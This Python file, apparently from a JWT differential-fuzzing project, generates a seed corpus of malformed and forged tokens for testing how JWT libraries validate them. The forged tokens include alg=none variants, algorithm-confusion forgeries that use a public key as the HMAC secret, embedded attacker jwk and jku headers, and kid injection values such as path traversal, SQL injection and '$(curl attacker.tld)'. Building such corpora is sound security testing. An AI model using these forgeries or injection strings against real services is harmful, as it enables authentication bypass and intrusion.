Zion Boggan
repos/JWT Differential Fuzzer/scripts/build_corpus.py
zionboggan.com ↗
368 lines · python
History for this file →
1
"""Build corpus/seed.json. Programmatic, dense, multi-class.
2
 
3
Output classes are tagged so triage groups disagreements by bug-family.
4
Severity tags:
5
  bypass-risk : token should be REJECTED. If any lib accepts, that's an auth-bypass.
6
  dos-risk    : token should be ACCEPTED. If any lib rejects, that's a denial of validation.
7
  parser-quirk: tolerated divergence; surfaces lib personality.
8
"""
9
import base64
10
import hashlib
11
import hmac
12
import json
13
import os
14
import struct
15
from pathlib import Path
16
 
17
import jwt as pyjwt
18
from cryptography.hazmat.primitives import serialization
19
from cryptography.hazmat.primitives.asymmetric import rsa, ec, ed25519
20
 
21
def b64u(b: bytes) -> str:
22
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()
23
 
24
def b64u_json(o) -> str:
25
    return b64u(json.dumps(o, separators=(",", ":")).encode())
26
 
27
def gen_keys():
28
    rsa_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
29
    rsa_priv = rsa_key.private_bytes(
30
        serialization.Encoding.PEM,
31
        serialization.PrivateFormat.PKCS8,
32
        serialization.NoEncryption(),
33
    ).decode()
34
    rsa_pub = rsa_key.public_key().public_bytes(
35
        serialization.Encoding.PEM,
36
        serialization.PublicFormat.SubjectPublicKeyInfo,
37
    ).decode()
38
 
39
    ec_key = ec.generate_private_key(ec.SECP256R1())
40
    ec_priv = ec_key.private_bytes(
41
        serialization.Encoding.PEM,
42
        serialization.PrivateFormat.PKCS8,
43
        serialization.NoEncryption(),
44
    ).decode()
45
    ec_pub = ec_key.public_key().public_bytes(
46
        serialization.Encoding.PEM,
47
        serialization.PublicFormat.SubjectPublicKeyInfo,
48
    ).decode()
49
 
50
    return rsa_priv, rsa_pub, ec_priv, ec_pub, "schism-secret"
51
 
52
CLAIMS = {"sub": "alice", "iat": 1_700_000_000, "exp": 9_999_999_999}
53
 
54
def hs256_sign(secret_bytes: bytes, header: dict, claims: dict) -> str:
55
    h = b64u_json(header)
56
    p = b64u_json(claims)
57
    sig = hmac.new(secret_bytes, f"{h}.{p}".encode(), hashlib.sha256).digest()
58
    return f"{h}.{p}.{b64u(sig)}"
59
 
60
def cases():
61
    rsa_priv, rsa_pub, ec_priv, ec_pub, hmac_key = gen_keys()
62
    out = []
63
 
64
    def add(id_, cls, sev, token, key, algs, expected, notes=""):
65
        out.append({
66
            "id": id_, "class": cls, "severity": sev,
67
            "token": token, "key": key, "algs": algs,
68
            "expected_unanimous": expected, "notes": notes,
69
        })
70
 
71
    add("base-rs256", "baseline", "control",
72
        pyjwt.encode(CLAIMS, rsa_priv, algorithm="RS256"),
73
        rsa_pub, ["RS256"], "accept", "happy path RS256")
74
    add("base-hs256", "baseline", "control",
75
        pyjwt.encode(CLAIMS, hmac_key, algorithm="HS256"),
76
        hmac_key, ["HS256"], "accept", "happy path HS256")
77
    add("base-es256", "baseline", "control",
78
        pyjwt.encode(CLAIMS, ec_priv, algorithm="ES256"),
79
        ec_pub, ["ES256"], "accept", "happy path ES256")
80
 
81
    none_variants = [
82
        ("none", "alg=none lower"),
83
        ("None", "alg=None title"),
84
        ("NONE", "alg=NONE upper"),
85
        ("nOnE", "alg=nOnE mixed"),
86
        ("none\x00", "alg=none\\x00 trailing null"),
87
        (" none", "alg= none leading space"),
88
        ("none ", "alg=none trailing space"),
89
        ("none", "alg=none unicode escape"),
90
    ]
91
    for v, note in none_variants:
92
        h = b64u_json({"alg": v, "typ": "JWT"})
93
        p = b64u_json(CLAIMS)
94
        add(f"none-{v.strip().lower() or 'empty'}-{hash(v) & 0xFFF:x}",
95
            "none-alg", "bypass-risk",
96
            f"{h}.{p}.", "", ["RS256"], "reject", note)
97
 
98
    h = b64u_json({"alg": "none", "typ": "JWT"})
99
    p = b64u_json(CLAIMS)
100
    add("none-with-junk-sig", "none-alg", "bypass-risk",
101
        f"{h}.{p}.{b64u(b'whatever')}", "", ["RS256"], "reject",
102
        "alg=none with non-empty signature segment")
103
 
104
    for alg in ["HS256", "HS384", "HS512"]:
105
        sig_alg = {"HS256": hashlib.sha256, "HS384": hashlib.sha384, "HS512": hashlib.sha512}[alg]
106
        h = b64u_json({"alg": alg, "typ": "JWT"})
107
        p = b64u_json(CLAIMS)
108
        sig = hmac.new(rsa_pub.encode(), f"{h}.{p}".encode(), sig_alg).digest()
109
        add(f"alg-conf-rsa-as-{alg.lower()}", "alg-confusion", "bypass-risk",
110
            f"{h}.{p}.{b64u(sig)}", rsa_pub, ["RS256", alg], "reject",
111
            f"forge {alg} using RSA pubkey PEM as HMAC secret; allowlist includes both")
112
 
113
    for alg in ["HS256"]:
114
        sig_alg = hashlib.sha256
115
        h = b64u_json({"alg": alg, "typ": "JWT"})
116
        p = b64u_json(CLAIMS)
117
        sig = hmac.new(ec_pub.encode(), f"{h}.{p}".encode(), sig_alg).digest()
118
        add(f"alg-conf-ec-as-{alg.lower()}", "alg-confusion", "bypass-risk",
119
            f"{h}.{p}.{b64u(sig)}", ec_pub, ["ES256", alg], "reject",
120
            f"forge {alg} using EC pubkey PEM as HMAC secret")
121
 
122
    h = b64u_json({"alg": "HS256", "typ": "JWT"})
123
    p = b64u_json(CLAIMS)
124
    sig = hmac.new(rsa_pub.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
125
    add("alg-conf-strict-allowlist", "alg-confusion", "bypass-risk",
126
        f"{h}.{p}.{b64u(sig)}", rsa_pub, ["RS256"], "reject",
127
        "token claims HS256 but allowlist=[RS256] - must reject from allowlist alone")
128
 
129
    rsa_pub_der = base64.b64encode(
130
        serialization.load_pem_public_key(rsa_pub.encode()).public_bytes(
131
            serialization.Encoding.DER,
132
            serialization.PublicFormat.SubjectPublicKeyInfo,
133
        )
134
    ).decode()
135
    h = b64u_json({"alg": "HS256", "typ": "JWT"})
136
    p = b64u_json(CLAIMS)
137
    sig = hmac.new(rsa_pub_der.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
138
    add("alg-conf-rsa-der-as-hs256", "alg-confusion", "bypass-risk",
139
        f"{h}.{p}.{b64u(sig)}", rsa_pub_der, ["RS256", "HS256"], "reject",
140
        "RSA pubkey DER (no PEM headers) as HMAC secret - bypasses PEM-detection guards")
141
 
142
    crit_cases = [
143
        ({"alg": "HS256", "typ": "JWT", "crit": ["foobar"], "foobar": True},
144
         "crit references unknown ext"),
145
        ({"alg": "HS256", "typ": "JWT", "crit": ["b64"], "b64": False},
146
         "crit=b64=false (RFC 7797 detached payload)"),
147
        ({"alg": "HS256", "typ": "JWT", "crit": []},
148
         "crit empty array - strict reading rejects"),
149
        ({"alg": "HS256", "typ": "JWT", "crit": "foobar", "foobar": True},
150
         "crit as scalar string instead of array"),
151
        ({"alg": "HS256", "typ": "JWT", "crit": ["alg"], "alg": "HS256"},
152
         "crit names reserved 'alg' - RFC 7515 4.1.11 forbids reserved names"),
153
    ]
154
    for hdr, note in crit_cases:
155
        h = b64u_json(hdr)
156
        p = b64u_json(CLAIMS)
157
        sig = hmac.new(hmac_key.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
158
        slug = note.split()[0].lower().replace("=", "-").replace("/", "-")
159
        add(f"crit-{slug}-{hash(note) & 0xFFF:x}",
160
            "crit-header", "bypass-risk",
161
            f"{h}.{p}.{b64u(sig)}", hmac_key, ["HS256"], "reject", note)
162
 
163
    attacker_secret = "attacker-symmetric-key"
164
    h = b64u_json({"alg": "HS256", "typ": "JWT", "jwk": {"kty": "oct", "k": b64u(attacker_secret.encode())}})
165
    p = b64u_json(CLAIMS)
166
    sig = hmac.new(attacker_secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
167
    add("jwk-embed-oct-self-sign", "key-injection", "bypass-risk",
168
        f"{h}.{p}.{b64u(sig)}", hmac_key, ["HS256"], "reject",
169
        "header.jwk embeds attacker oct key, sig validates against THAT key")
170
 
171
    h = b64u_json({"alg": "RS256", "typ": "JWT",
172
                   "jwk": {"kty": "RSA", "n": b64u(b"x" * 256), "e": "AQAB"}})
173
    p = b64u_json(CLAIMS)
174
    add("jwk-embed-rsa-bogus-sig", "key-injection", "bypass-risk",
175
        f"{h}.{p}.{b64u(b'x' * 256)}", rsa_pub, ["RS256"], "reject",
176
        "header.jwk RSA + invalid sig; lib must use configured key, not jwk header")
177
 
178
    h = b64u_json({"alg": "RS256", "typ": "JWT", "jku": "https://attacker.example/jwks.json"})
179
    p = b64u_json(CLAIMS)
180
    add("jku-attacker-url", "key-injection", "bypass-risk",
181
        f"{h}.{p}.{b64u(b'x' * 256)}", rsa_pub, ["RS256"], "reject",
182
        "header.jku to attacker domain. Lib must not fetch; sig is invalid anyway.")
183
 
184
    kids = [
185
        "../../../../dev/null",
186
        "'; DROP TABLE keys;--",
187
        "$(curl attacker.tld)",
188
        "key1\nkey2",
189
        "\\\\attacker\\share\\key.pem",
190
        "{\"$ne\": null}",
191
        "../../etc/passwd",
192
        "๐Ÿ”‘",
193
    ]
194
    for k in kids:
195
        h = b64u_json({"alg": "HS256", "typ": "JWT", "kid": k})
196
        p = b64u_json(CLAIMS)
197
        slug = "kid-" + hashlib.sha1(k.encode()).hexdigest()[:8]
198
        add(slug, "kid-injection", "parser-quirk",
199
            f"{h}.{p}.{b64u(b'x' * 32)}", hmac_key, ["HS256"], "reject",
200
            f"kid={k!r} - sig bogus, value is whether lib surfaces oddly")
201
 
202
    good_hs = pyjwt.encode(CLAIMS, hmac_key, algorithm="HS256")
203
    h_part, p_part, sig_part = good_hs.split(".")
204
    sig_mutations = [
205
        ("empty", ""),
206
        ("zero32", b64u(b"\x00" * 32)),
207
        ("ones32", b64u(b"\xff" * 32)),
208
        ("truncated", sig_part[:20]),
209
        ("doubled", sig_part + sig_part),
210
        ("ascii", b64u(b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")),
211
        ("padded", sig_part + "===="),
212
        ("urlsafe-vs-std", sig_part.replace("-", "+").replace("_", "/")),
213
    ]
214
    for name, mut in sig_mutations:
215
        add(f"sig-{name}", "sig-mutation", "bypass-risk",
216
            f"{h_part}.{p_part}.{mut}", hmac_key, ["HS256"], "reject",
217
            f"sig mutation: {name}")
218
 
219
    good_es = pyjwt.encode(CLAIMS, ec_priv, algorithm="ES256")
220
    h_es, p_es, sig_es = good_es.split(".")
221
    raw_sig = base64.urlsafe_b64decode(sig_es + "===")
222
    zero64 = b"\x00" * 64
223
    leading0 = b"\x00" + raw_sig
224
    s_zero = raw_sig[:32] + b"\x00" * 32
225
    add("ecdsa-zero-rs", "ecdsa-encoding", "bypass-risk",
226
        f"{h_es}.{p_es}.{b64u(zero64)}", ec_pub, ["ES256"], "reject",
227
        "ES256 with r=0, s=0 - must reject")
228
    add("ecdsa-65byte", "ecdsa-encoding", "bypass-risk",
229
        f"{h_es}.{p_es}.{b64u(leading0)}", ec_pub, ["ES256"], "reject",
230
        "ES256 with extra leading zero byte (65 bytes total)")
231
    add("ecdsa-s-zero", "ecdsa-encoding", "bypass-risk",
232
        f"{h_es}.{p_es}.{b64u(s_zero)}", ec_pub, ["ES256"], "reject",
233
        "ES256 with valid r and s=0")
234
 
235
    type_claims = [
236
        ({**CLAIMS, "exp": "9999999999"}, "exp as string", "accept"),
237
        ({**CLAIMS, "exp": True}, "exp as bool true", "accept"),
238
        ({**CLAIMS, "exp": [9_999_999_999]}, "exp as 1-elem array", "accept"),
239
        ({**CLAIMS, "exp": None}, "exp as null", "accept"),
240
        ({**CLAIMS, "exp": -1}, "exp negative -1", "reject"),
241
        ({**CLAIMS, "exp": 0}, "exp zero", "reject"),
242
        ({**CLAIMS, "exp": 9_999_999_999.5}, "exp float well-future", "accept"),
243
        ({**CLAIMS, "iat": "1700000000"}, "iat as string", "accept"),
244
        ({**CLAIMS, "nbf": 9_999_999_999}, "nbf far future", "reject"),
245
        ({**CLAIMS, "sub": 12345}, "sub as int", "accept"),
246
    ]
247
    for cl, note, exp in type_claims:
248
        token = pyjwt.encode(cl, rsa_priv, algorithm="RS256")
249
        slug = "claim-" + hashlib.sha1(note.encode()).hexdigest()[:8]
250
        add(slug, "claim-typing",
251
            "dos-risk" if exp == "accept" else "bypass-risk",
252
            token, rsa_pub, ["RS256"], exp, note)
253
 
254
    raw_dup = b'{"alg":"none","alg":"HS256","typ":"JWT"}'
255
    p = b64u_json(CLAIMS)
256
    sig = hmac.new(hmac_key.encode(),
257
                   f"{b64u(raw_dup)}.{p}".encode(), hashlib.sha256).digest()
258
    add("hdr-dup-alg-keys-with-valid-hs256-sig", "header-quirk", "bypass-risk",
259
        f"{b64u(raw_dup)}.{p}.{b64u(sig)}", hmac_key, ["HS256"], "accept",
260
        "dup alg keys; if last-wins (HS256), sig is valid; if first-wins (none), sig is bogus")
261
 
262
    raw_dup2 = b'{"alg":"HS256","alg":"none","typ":"JWT"}'
263
    add("hdr-dup-alg-none-last", "header-quirk", "bypass-risk",
264
        f"{b64u(raw_dup2)}.{p}.{b64u(sig)}", hmac_key, ["HS256"], "reject",
265
        "dup alg keys, none last; first-wins lib accepts (sig good for HS256)")
266
 
267
    raw_comment = b'{/*x*/"alg":"HS256","typ":"JWT"}'
268
    h = b64u(raw_comment)
269
    sig = hmac.new(hmac_key.encode(),
270
                   f"{h}.{p}".encode(), hashlib.sha256).digest()
271
    add("hdr-json-comment", "header-quirk", "parser-quirk",
272
        f"{h}.{p}.{b64u(sig)}", hmac_key, ["HS256"], "reject",
273
        "header JSON contains a /* */ comment")
274
 
275
    raw_trailing = b'{"alg":"HS256","typ":"JWT",}'
276
    h = b64u(raw_trailing)
277
    sig = hmac.new(hmac_key.encode(),
278
                   f"{h}.{p}".encode(), hashlib.sha256).digest()
279
    add("hdr-json-trailing-comma", "header-quirk", "parser-quirk",
280
        f"{h}.{p}.{b64u(sig)}", hmac_key, ["HS256"], "reject",
281
        "trailing comma in header JSON - strict reject, lenient accept")
282
 
283
    raw_bom = b"\xef\xbb\xbf" + b'{"alg":"HS256","typ":"JWT"}'
284
    h = b64u(raw_bom)
285
    sig = hmac.new(hmac_key.encode(),
286
                   f"{h}.{p}".encode(), hashlib.sha256).digest()
287
    add("hdr-utf8-bom", "header-quirk", "parser-quirk",
288
        f"{h}.{p}.{b64u(sig)}", hmac_key, ["HS256"], "reject",
289
        "UTF-8 BOM at start of header JSON")
290
 
291
    h = b64u_json({"alg": 256, "typ": "JWT"})
292
    sig = hmac.new(hmac_key.encode(),
293
                   f"{h}.{p}".encode(), hashlib.sha256).digest()
294
    add("hdr-alg-as-int", "header-quirk", "bypass-risk",
295
        f"{h}.{p}.{b64u(sig)}", hmac_key, ["HS256"], "reject",
296
        "alg=256 (int) - must reject (must be StringOrURI)")
297
 
298
    h = b64u_json({"alg": ["HS256"], "typ": "JWT"})
299
    sig = hmac.new(hmac_key.encode(),
300
                   f"{h}.{p}".encode(), hashlib.sha256).digest()
301
    add("hdr-alg-as-array", "header-quirk", "bypass-risk",
302
        f"{h}.{p}.{b64u(sig)}", hmac_key, ["HS256"], "reject",
303
        "alg=['HS256'] - must reject")
304
 
305
    good = pyjwt.encode(CLAIMS, hmac_key, algorithm="HS256")
306
    h_, p_, s_ = good.split(".")
307
    add("fmt-trailing-dot", "format", "parser-quirk",
308
        good + ".", hmac_key, ["HS256"], "reject",
309
        "trailing dot - fourth empty segment")
310
    add("fmt-five-segments", "format", "parser-quirk",
311
        good + ".extra.junk", hmac_key, ["HS256"], "reject",
312
        "5-dot-separated segments (JWE-shape masquerade)")
313
    add("fmt-leading-ws", "format", "parser-quirk",
314
        " " + good, hmac_key, ["HS256"], "reject",
315
        "leading whitespace before token")
316
    add("fmt-trailing-ws", "format", "parser-quirk",
317
        good + " ", hmac_key, ["HS256"], "reject",
318
        "trailing whitespace after token")
319
    add("fmt-double-slash", "format", "parser-quirk",
320
        good + "//", hmac_key, ["HS256"], "reject",
321
        "trailing // - base64 padding chars")
322
    add("fmt-extra-padding", "format", "parser-quirk",
323
        f"{h_}=.{p_}=.{s_}=", hmac_key, ["HS256"], "reject",
324
        "explicit base64 padding on each segment")
325
 
326
    add("allow-empty", "allowlist-edge", "bypass-risk",
327
        good, hmac_key, [], "reject", "empty allowlist - must reject")
328
    add("allow-mismatch", "allowlist-edge", "bypass-risk",
329
        good, hmac_key, ["RS256"], "reject",
330
        "token alg=HS256 but allowlist=[RS256]")
331
    add("allow-superset", "allowlist-edge", "control",
332
        good, hmac_key, ["HS256", "RS256", "ES256"], "accept",
333
        "broad allowlist that includes token alg")
334
 
335
    h = b64u_json({"alg": "HS256", "b64": False, "crit": ["b64"]})
336
    payload_raw = json.dumps(CLAIMS, separators=(",", ":")).encode()
337
    signing_input = h.encode() + b"." + payload_raw
338
    sig = hmac.new(hmac_key.encode(), signing_input, hashlib.sha256).digest()
339
 
340
    add("b64-false-detached", "b64-detached", "bypass-risk",
341
        f"{h}..{b64u(sig)}", hmac_key, ["HS256"], "reject",
342
        "RFC 7797 detached payload - most libs don't support; must reject")
343
 
344
    h = b64u_json({"alg": "HS256", "b64": False})
345
    add("b64-false-no-crit", "b64-detached", "bypass-risk",
346
        f"{h}..{b64u(sig)}", hmac_key, ["HS256"], "reject",
347
        "b64=false without crit - spec violation, must reject")
348
 
349
    return out
350
 
351
def main():
352
    cs = cases()
353
    Path("corpus/seed.json").write_text(json.dumps(cs, indent=2))
354
    print(f"wrote {len(cs)} cases -> corpus/seed.json")
355
    by_class = {}
356
    by_sev = {}
357
    for c in cs:
358
        by_class[c["class"]] = by_class.get(c["class"], 0) + 1
359
        by_sev[c["severity"]] = by_sev.get(c["severity"], 0) + 1
360
    print("by class:")
361
    for k, v in sorted(by_class.items()):
362
        print(f"  {k:20s} {v}")
363
    print("by severity:")
364
    for k, v in sorted(by_sev.items()):
365
        print(f"  {k:20s} {v}")
366
 
367
if __name__ == "__main__":
368
    main()